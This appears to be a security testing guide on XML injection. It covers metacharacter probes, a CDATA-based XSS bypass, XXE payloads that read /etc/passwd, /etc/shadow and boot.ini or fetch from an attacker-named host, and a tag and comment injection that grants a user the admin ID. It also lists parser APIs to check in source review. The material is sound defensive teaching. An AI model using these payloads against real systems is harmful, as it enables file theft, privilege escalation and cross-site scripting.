<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
</users>
When a user registers by filling in an HTML form, the application receives the user’s data in a standard request which, for the sake of simplicity, is assumed to be sent as a GET request.
For example, the following values:
Username: tony
Password: Un6R34kb!e
E-mail: [email protected]
will produce the request:
http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&[email protected]
The application, then, builds the following node:
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
which will be added to the xmlDB:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
</users>
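The registration flow above can be sketched as follows. This is a minimal illustration in Python, not the application's actual code: the function name `build_user_node`, the default `userid` of 500, and the sample address `tony@example.com` are assumptions made for the example. The point it shows is that the request parameters are pasted into the markup without any escaping.

```python
def build_user_node(username: str, password: str, mail: str, userid: int = 500) -> str:
    """Build a <user> node by plain string concatenation (the vulnerable pattern)."""
    # No escaping is applied: any markup in the parameters becomes part of the document.
    return (
        "<user>\n"
        f"<username>{username}</username>\n"
        f"<password>{password}</password>\n"
        f"<userid>{userid}</userid>\n"
        f"<mail>{mail}</mail>\n"
        "</user>"
    )


# Hypothetical registration data mirroring the example request.
node = build_user_node("tony", "Un6R34kb!e", "tony@example.com")
print(node)
```

Because the values are inserted verbatim, every test in the rest of this section amounts to choosing parameter values that change the structure of this string.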
Discovery
The first step in testing an application for an XML injection vulnerability is to try inserting XML metacharacters.
XML metacharacters are:
Single quote: '
- When not sanitized, this character could throw an exception during XML parsing, if the injected value is going to be part of an attribute value in a tag.
As an example, let’s suppose there is the following attribute:
<node attrib='$inputValue'/>
So, if:
$inputValue = foo'
is inserted as the attrib value:
<node attrib='foo''/>
then the resulting XML document is not well formed.
Double quote: "
- This character has the same meaning as the single quote, and it could be used if the attribute value is enclosed in double quotes.
<node attrib="$inputValue"/>
So if:
$inputValue = foo"
the substitution gives:
<node attrib="foo""/>
and the resulting XML document is not well formed.
Angle brackets: > and <
- By adding an opening or closing angle bracket to a user input like the following:
Username = foo<
the application will build a new node:
<user>
<username>foo<</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
but, because of the presence of the open ‘<’, the resulting XML document is not well formed.
Comment tag: <!--/-->
- This sequence of characters is interpreted as the beginning/end of a comment. So by injecting one of them in the Username parameter:
Username = foo<!--
the application will build a node like the following:
<user>
<username>foo<!--</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
which won’t be a well-formed XML sequence.
Ampersand: &
- The ampersand is used in the XML syntax to represent entities. The format of an entity is &symbol;. An entity is mapped to a character in the Unicode character set.
For example:
<tagnode>&lt;</tagnode>
is well formed and valid, and represents the < ASCII character.
If & is not itself encoded as &amp;, it could be used to test for XML injection.
In fact, if an input like the following is provided:
Username = &foo
a new node will be created:
<user>
<username>&foo</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
but, again, the document is not well formed: &foo is not terminated with ; and the &foo; entity is undefined.
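The quote, angle bracket, comment, and ampersand probes described so far can be reproduced locally with a short sketch. It assumes Python's standard `xml.etree.ElementTree` parser as a stand-in for whatever parser the target uses, and the helper name `is_well_formed` is hypothetical. Against a real application the tester observes the error response rather than calling a parser directly.

```python
import xml.etree.ElementTree as ET


def is_well_formed(xml_text: str) -> bool:
    """Return True if the standard-library parser accepts the text."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


# Each probe is a fragment as it would look after naive substitution of the input.
probes = {
    "single quote": "<node attrib='foo''/>",
    "double quote": '<node attrib="foo""/>',
    "angle bracket": "<username>foo<</username>",
    "comment start": "<username>foo<!--</username>",
    "bare ampersand": "<username>&foo</username>",
    "undefined entity": "<username>&foo;</username>",
    "escaped ampersand": "<username>&amp;foo</username>",
}

for name, fragment in probes.items():
    print(f"{name}: {'accepted' if is_well_formed(fragment) else 'rejected'}")
```

Only the fragment with the escaped ampersand is accepted. Every other probe makes the parser raise an error, which is the signal the tester looks for.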
CDATA section delimiters: <![CDATA[ / ]]>
- CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.
For example, if there is the need to represent the string <foo> inside a text node, a CDATA section may be used:
<node>
<![CDATA[<foo>]]>
</node>
so that <foo> won’t be parsed as markup and will be considered as character data.
If a node is created in the following way:
<username><![CDATA[$userName]]></username>
the tester could try to inject the end CDATA string ]]> in order to invalidate the XML document.
userName = ]]>
This will become:
<username><![CDATA[]]>]]></username>
which is not a well-formed XML fragment.
Another test is related to the CDATA tag. Suppose that the XML document is processed to generate an HTML page. In this case, the CDATA section delimiters may simply be removed without further inspection of their contents. It is then possible to inject HTML tags, which will be included in the generated page, completely bypassing existing sanitization routines.
Let’s consider a concrete example. Suppose we have a node containing some text that will be displayed back to the user.
<html>
$HTMLCode
</html>
Then, an attacker can provide the following input:
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
and obtain the following node:
<html>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
</html>
During the processing, the CDATA section delimiters are eliminated, generating the following HTML code:
<script>
alert('xss')
</script>
The result is that the application is vulnerable to XSS.
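The bypass can be modelled in a few lines. Both functions below are hypothetical stand-ins: `naive_filter` represents a sanitization routine that only looks for a literal `<script`, and `strip_cdata_delimiters` represents a processing step that removes the delimiters without inspecting what they enclose.

```python
def naive_filter(text: str) -> bool:
    """Hypothetical sanitization check: accept input only if it has no literal '<script'."""
    return "<script" not in text.lower()


def strip_cdata_delimiters(text: str) -> str:
    """Model a step that removes CDATA delimiters without inspecting the content."""
    return text.replace("<![CDATA[", "").replace("]]>", "")


payload = (
    "<![CDATA[<]]>script<![CDATA[>]]>alert('xss')"
    "<![CDATA[<]]>/script<![CDATA[>]]>"
)

print(naive_filter(payload))            # True: the filter sees no literal "<script"
print(strip_cdata_delimiters(payload))  # <script>alert('xss')</script>
```

The payload passes the filter because each angle bracket is wrapped in its own CDATA section, and the script tag only appears once the delimiters are removed.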
External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, an XML parser resolves an external entity by accessing the resource specified by the URI, e.g., a file on the local machine or on a remote system. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to cause a denial of service on the local system, gain unauthorized access to files on the local machine, scan remote machines, and cause a denial of service on remote systems.
To test for XXE vulnerabilities, one can use the following input:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]>
<foo>&xxe;</foo>
This test could crash the web server (on a UNIX system) if the XML parser attempts to substitute the entity with the contents of the /dev/random file, because reading that file never reaches an end.
Other useful tests are the following:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
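Since these test documents differ only in the entity's URI, they can be generated from one template. The sketch below only builds the payload strings and does not send them. The names `XXE_TEMPLATE`, `TARGET_URIS`, and `build_xxe_payload` are illustrative assumptions, and the URIs are the ones listed above.

```python
XXE_TEMPLATE = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    "<!DOCTYPE foo [ <!ELEMENT foo ANY >\n"
    '<!ENTITY xxe SYSTEM "{uri}" >]><foo>&xxe;</foo>'
)

# Target URIs taken from the tests listed above.
TARGET_URIS = [
    "file:///etc/passwd",
    "file:///etc/shadow",
    "file:///c:/boot.ini",
    "http://www.attacker.com/text.txt",
]


def build_xxe_payload(uri: str) -> str:
    """Return an XML document whose xxe entity points at the given URI."""
    if '"' in uri:
        # A double quote would terminate the SYSTEM literal early.
        raise ValueError("URI must not contain a double quote")
    return XXE_TEMPLATE.format(uri=uri)


payloads = [build_xxe_payload(uri) for uri in TARGET_URIS]
print(payloads[0])
```

Each generated document is submitted wherever the application accepts XML. A response that echoes the contents of the referenced resource indicates that external entities are being resolved.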
Tag Injection
Once the first step is accomplished, the tester will have some information about the structure of the XML document. Then, it is possible to try to inject XML data and tags. We will show an example of how this can lead to a privilege escalation attack.
Let’s consider the previous application. By inserting the following values:
Username: tony
Password: Un6R34kb!e
E-mail: [email protected]</mail><userid>0</userid><mail>[email protected]
the application will build a new node and append it to the XML database:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
</users>
The resulting XML file is well formed. Furthermore, it is likely that, for the user tony, the value associated with the userid tag is the one appearing last, i.e., 0 (the admin ID). In other words, we have injected a user with administrative privileges.
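Which `userid` wins depends on how the application reads the node. The sketch below assumes a reader that copies child elements into a dictionary, so a later duplicate overwrites an earlier one. The address `tony@example.com` is a hypothetical placeholder, and the standard `xml.etree.ElementTree` parser stands in for the application's parser.

```python
import xml.etree.ElementTree as ET

# Hypothetical addresses; the injected value closes <mail> and opens new nodes.
injected_mail = "tony@example.com</mail><userid>0</userid><mail>tony@example.com"

node = (
    "<user>"
    "<username>tony</username>"
    "<password>Un6R34kb!e</password>"
    "<userid>500</userid>"
    f"<mail>{injected_mail}</mail>"
    "</user>"
)

user = ET.fromstring(node)  # parses without error: the node is well formed

# A reader that copies children into a dictionary keeps the last duplicate.
record = {}
for child in user:
    record[child.tag] = child.text

print([e.text for e in user.findall("userid")])  # ['500', '0']
print(record["userid"])                          # 0
```

A reader that takes the first match instead (for example `user.find("userid")`) would still see 500, which is why the outcome of this test has to be confirmed against the application's behavior.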
The only problem is that the userid tag appears twice in the last user node. Often, XML documents are associated with a schema or a DTD and will be rejected if they don’t comply with it.
Let’s suppose that the XML document is specified by the following DTD:
<!DOCTYPE users [
<!ELEMENT users (user+) >
<!ELEMENT user (username,password,userid,mail+) >
<!ELEMENT username (#PCDATA) >
<!ELEMENT password (#PCDATA) >
<!ELEMENT userid (#PCDATA) >
<!ELEMENT mail (#PCDATA) >
]>
Note that the userid node is defined with cardinality 1. In this case, the attack we have shown before (and other simple attacks) will not work, if the XML document is validated against its DTD before any processing occurs.
However, this problem can be solved if the tester controls the value of some nodes preceding the offending node (userid, in this example). In fact, the tester can comment out that node by injecting a comment start/end sequence:
Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><userid>0</userid><mail>[email protected]
In this case, the final XML database is:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password><!--</password>
<userid>500</userid>
<mail>--><userid>0</userid><mail>[email protected]</mail>
</user>
</users>
The original userid node has been commented out, leaving only the injected one. The document now complies with its DTD rules.
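The effect of the comment injection can be checked with a short sketch. Python's standard library does not validate against a DTD, so the regular expression below is only a stand-in for the content model `(username,password,userid,mail+)`. The address `tony@example.com` is a hypothetical placeholder.

```python
import re
import xml.etree.ElementTree as ET

# Values from the example; the address is a hypothetical placeholder.
password = "Un6R34kb!e</password><!--"
mail = "--><userid>0</userid><mail>tony@example.com"

node = (
    "<user>\n"
    "<username>tony</username>\n"
    f"<password>{password}</password>\n"
    "<userid>500</userid>\n"
    f"<mail>{mail}</mail>\n"
    "</user>"
)

user = ET.fromstring(node)  # comments are dropped by the default parser
tags = [child.tag for child in user]

# Stand-in for DTD validation of (username,password,userid,mail+).
matches_model = re.fullmatch(r"username password userid( mail)+", " ".join(tags)) is not None

print(tags)                                    # ['username', 'password', 'userid', 'mail']
print(user.findtext("userid"), matches_model)  # 0 True
```

Only one `userid` element remains after parsing, and it carries the injected value, so a validator enforcing cardinality 1 has nothing to reject.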
Source Code Review
The following Java APIs may be vulnerable to XXE if they are not configured properly.
javax.xml.parsers.DocumentBuilder
javax.xml.parsers.DocumentBuilderFactory
org.xml.sax.EntityResolver
org.dom4j.*
javax.xml.parsers.SAXParser
javax.xml.parsers.SAXParserFactory
TransformerFactory
SAXReader
DocumentHelper
SAXBuilder
XMLReaderFactory
XMLInputFactory
SchemaFactory
DocumentBuilderFactoryImpl
SAXTransformerFactory
XMLReader
Xerces: DOMParser, DOMParserImpl, SAXParser, XMLParser
Check the source code to confirm that DOCTYPE declarations, external DTDs, and external parameter entities are disallowed. See the XML External Entity (XXE) Prevention Cheat Sheet.
In addition, the Java POI office reader may be vulnerable to XXE if the version is earlier than 3.10.1.
The version of the POI library can be identified from the filename of the JAR. For example:
poi-3.8.jar
poi-ooxml-3.8.jar
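The filename check can be automated with a small sketch. The pattern and the helper names `poi_version` and `may_be_vulnerable` are assumptions for illustration. A renamed or repackaged JAR will not match, so a negative result is not proof that the library is absent or current.

```python
import re

FIXED_VERSION = (3, 10, 1)  # versions earlier than this are treated as affected

# Matches names such as poi-3.8.jar or poi-ooxml-3.8.jar; an optional
# qualifier after the version (for example "-FINAL") is tolerated.
JAR_PATTERN = re.compile(r"^poi(?:-[a-z]+)*-(\d+(?:\.\d+)*)(?:-[\w.]+)?\.jar$")


def poi_version(jar_name: str):
    """Return the version encoded in a POI JAR filename as a tuple, or None."""
    match = JAR_PATTERN.match(jar_name)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def may_be_vulnerable(jar_name: str) -> bool:
    """True when the filename indicates a POI version earlier than 3.10.1."""
    version = poi_version(jar_name)
    return version is not None and version < FIXED_VERSION


for name in ("poi-3.8.jar", "poi-ooxml-3.8.jar", "poi-3.10.1.jar"):
    print(name, may_be_vulnerable(name))
```

Versions are compared as integer tuples, so 3.8 sorts before 3.10.1, which a plain string comparison would get wrong.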
The following source code keywords may apply to C.
libxml2: xmlCtxtReadMemory, xmlCtxtUseOptions, xmlParseInNodeContext, xmlReadDoc, xmlReadFd, xmlReadFile, xmlReadIO, xmlReadMemory, xmlCtxtReadDoc, xmlCtxtReadFd, xmlCtxtReadFile, xmlCtxtReadIO
libxerces-c: XercesDOMParser, SAXParser, SAX2XMLReader
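A keyword search over the source tree is a quick way to locate these entry points. The sketch below scans a string of source text for a subset of the libxml2 names. The helper `find_parser_calls` and the C snippet are hypothetical. A hit is only a place to review, in particular for parser options such as `XML_PARSE_NOENT`, which turns on entity substitution.

```python
import re

# A subset of the libxml2 entry points listed above.
LIBXML2_KEYWORDS = [
    "xmlCtxtReadMemory", "xmlCtxtUseOptions", "xmlParseInNodeContext",
    "xmlReadDoc", "xmlReadFd", "xmlReadFile", "xmlReadIO", "xmlReadMemory",
]

KEYWORD_RE = re.compile(r"\b(" + "|".join(map(re.escape, LIBXML2_KEYWORDS)) + r")\b")


def find_parser_calls(source_text: str):
    """Return (line_number, keyword) pairs for every keyword occurrence."""
    hits = []
    for line_number, line in enumerate(source_text.splitlines(), start=1):
        for match in KEYWORD_RE.finditer(line):
            hits.append((line_number, match.group(1)))
    return hits


# Hypothetical C snippet used only to exercise the scanner.
sample = """#include <libxml/parser.h>
xmlDocPtr load(const char *path) {
    return xmlReadFile(path, NULL, XML_PARSE_NOENT);
}
"""

print(find_parser_calls(sample))  # [(3, 'xmlReadFile')]
```

The same approach works for the Java class names listed earlier by swapping in a different keyword list.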
XML Injection Fuzz Strings (from wfuzz tool)
References
XML Injection
Gregory Steuck, “XXE (Xml eXternal Entity) attack”
OWASP XXE Prevention Cheat Sheet